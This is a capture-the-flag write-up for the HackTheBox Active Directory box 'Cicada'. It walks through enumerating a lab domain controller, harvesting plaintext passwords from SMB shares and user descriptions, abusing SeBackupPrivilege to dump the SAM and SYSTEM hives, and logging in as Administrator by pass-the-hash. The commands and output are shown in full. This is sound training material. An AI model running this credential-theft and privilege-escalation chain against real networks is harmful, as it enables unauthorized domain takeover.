Cicada
Easy Windows Active Directory Box
Reconnaissance
As always we start off by performing a port scan to enumerate services and versions running on the target using Nmap
nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.35Nmap scan report for 10.10.11.35
Host is up (0.043s latency).
Not shown: 65522 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-02 19:43:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
51785/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-02T19:44:39
|_ start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 2 13:45:19 2025 -- 1 IP address (1 host up) scanned in 122.75 secondsWe can notice we're facing a DC (Domain Controller) Because of the simultaneously open ports like TCP 88 (Kerberos) | TCP 389 (LDAP) | TCP 5985 (WinRM) ... which is common for DCs, we can also see the virtual host which is cicada.htb and CICADA-DC.cicada.htb so let's add them to our /etc/hosts file
We already know that following a good methodology is the most important on a pentest therefore we will need to enumerate every single thing that may contain useful information
so let's start by enumerating the open TCP Pport 53 (DNS) using dig
dig @10.10.11.35 cicada.htb NS
...
dig @10.10.11.35 cicada.htb MX
...
dig @10.10.11.35 cicada.htb TXT
...
dig @10.10.11.35 cicada.htb AXFR
...This time the records didn't contain anything useful so let's move on to enumerate the TCP Port 88 (Kerberos) using the Kerbrute tool to try and enumerate possible users:
kerbrute userenum --dc 10.10.11.35 -d cicada.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/02/25 - Ronnie Flathers @ropnop
2025/08/02 14:53:00 > Using KDC(s):
2025/08/02 14:53:00 > 10.10.11.35:88
2025/08/02 14:53:03 > [+] VALID USERNAME: guest@cicada.htb
2025/08/02 14:53:08 > [+] VALID USERNAME: administrator@cicada.htbWe see that the user Guest is available so it will help us with further enumeration using NULL sessions
Now let's enumerate the TCP Port 135 (RPC) using the tool rpcclient with the use of a NULL session
rpcclient -U "Guest" 10.10.11.35
Password for [WORKGROUP\Guest]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIEDWe also didn't extract any information there so let's continue our reconnaissance
Let's try and enumerate TCP Port 445 (SMB) with the use of Netexec (Newer version of CrackMapExec)
netexec smb 10.10.11.35 -u 'guest' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share The HR (Human Resources?) share seems interesting, so let's check it using smbcient
smbclient -U 'guest' //10.10.11.35/HR And we see it contains a file called Notice from HR.txt with this information:
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada CorpAnd we finally found a password! — Cicada$M6Corpb*@Lp#nZp!8
After prforming a password spray with Kerbrute we see it doesnt work with any user
kerbrute passwordspray --verbose -d cicada.htb --dc 10.10.11.35 users.txt 'Cicada$M6Corpb*@Lp#nZp!8'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/02/25 - Ronnie Flathers @ropnop
2025/08/02 15:16:29 > Using KDC(s):
2025/08/02 15:16:29 > 10.10.11.35:88
2025/08/02 15:16:29 > [!] Guest@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2025/08/02 15:16:29 > [!] krbtgt@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - USER LOCKED OUT
2025/08/02 15:16:29 > [!] john.smoulder@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] emily.oscars@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] Administrator@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] michael.wrightson@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] sarah.dantelia@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] david.orelious@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] CICADA-DC$@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > Done! Tested 9 logins (0 successes) in 0.101 secondsRID Brute-Force
As we didn't get any username let's try to enumerate usernames using a RID Brute-Force with netexec
netexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep "(SidTypeUser)"
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1601: CICADA\emily.oscars (SidTypeUser)And finally, we found valid usernames, so let's add them into a user.txt file to further attacks
Further Enumeration
Some AD users don’t have Kerberos pre-authentication enabled. That means we can request a TGT for them without a password, and the KDC will send back a hash we can crack offline.
So we already have valid usernames — now we’re checking which ones are AS-REP Roastable
impacket-GetNPUsers cicada.htb/ -no-pass -usersfile users.txt -format john
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User CICADA-DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User john.smoulder doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sarah.dantelia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User michael.wrightson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User david.orelious doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User emily.oscars doesn't have UF_DONT_REQUIRE_PREAUTH setBut we see none of them are AS-REP Roastable either
Let's See if we can access through SMB trying the found password with every user using Netexec again
netexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
[*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
-------- SNIP -----------
[+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp #nZp!8
-Username- -Last PW Set- -BadPW- -Description-
Administrator 2024-08-26 20:08:03 9 Built-in account for administering the computer/domain
Guest 2024-08-28 17:26:56 1 Built-in account for guest access to the computer/domain
krbtgt 2024-03-14 11:14:10 1 Key Distribution Center Service Account
john.smoulder 2024-03-14 12:17:29 9
sarah.dantelia 2024-03-14 12:17:29 9
michael.wrightson 2024-03-14 12:17:29 0
david.orelious 2024-03-14 12:17:29 8 Just in case I forget my password is aRt$Lp#7t*VQ!3
emily.oscars 2024-08-22 21:20:17 8
[*] Enumerated 8 local users: CICADAAnd we see it works for the user michael.wrightson and we found something interesting too, what seems to be the password for the user david.orelious — aRt$Lp#7t*VQ!3
Let's try and enumerate the shares too using both of these credentials we found
netexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
-------- SNIP -----------
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
netexec smb 10.10.11.35 -u users.txt -p 'aRt$Lp#7t*VQ!3' --shares
-------- SNIP -----------
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share We can see david.orelious has access to a new interesting share called DEV so let's enumerate it using smbclient as we did before
smbclient -U 'david.orelious' //10.10.11.35/DEVAnd we found a script called Backup_Script.ps1 so let's see what's inside it
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"And we found the password for emily.oscars — Q!3@Lp#M6b*7t*Vt!!
Logging into the WinRM Service
Using these credentials we can successfully login into the WinRM service using evil-winrm
evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.7
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> And we're in!!
Using whoami /priv we find some misconfigurations:
Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledThe one we're going to approach is the SeBackupPrivilege
Dumping SAM and System
It lets us read sensitive system files, even ones protected by the OS, so let's create a Temp directory under C:\
Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> mkdir C:\Temp
Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd C:\TempWe can use this to dump the SAM and SYSTEM hives, which contain password hashes.
*Evil-WinRM* PS C:\Temp> reg save hklm\sam C:\Temp\sam.hive
*Evil-WinRM* PS C:\Temp> reg save hklm\system C:\Temp\system.hiveThen we can download these files into our attacker system with the Evil-WinRM download function, and finally dump them using impacket-secretsdump
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...And then we can just do a Pass-The-Hash using Evil-WinRM with the obtained Administrator LM hash
evil-winrm -i 10.10.11.35 -u administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
691c7231cdead497e605a022382efcb8And there's the root flag, overall one of my favourite Active Directory HackTheBox boxes because of how much you need to enumerate and how it tests your recon skills.
Hope this helped you, thank you for reading and see you next time!!
Last updated